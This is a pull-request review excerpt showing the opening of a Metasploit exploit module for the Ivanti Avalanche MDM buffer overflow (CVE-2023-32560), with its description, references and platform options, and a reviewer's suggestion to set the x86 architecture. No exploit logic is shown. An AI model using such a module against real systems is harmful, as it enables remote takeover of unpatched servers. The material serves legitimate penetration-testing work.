modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb

```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Avalanche MDM Buffer Overflow',
+        'Description' => %q{
+          This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
+          An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
+          which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
+          This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
+          The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
+          Upon successfull exploitation the attacker gains full access to the target system.
+
+          This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module
+          'A researcher at Tenable' # Discovery
+        ],
+        'References' => [
+          ['CVE', '2023-32560'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],
+          ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Platform' => 'win',
```

Comment:
Is this exploit compatible with both x86 and x64 architectures? It is recommended to specify the architecture here to make sure the right payload is selected. For example, if only x86 payloads are supported:
```suggestion
        'Platform' => 'win',
        'Arch' => ARCH_X86,
```

Reply:
Good catch, the product is only distributed with x86 binaries we can set to `ARCH_X86`.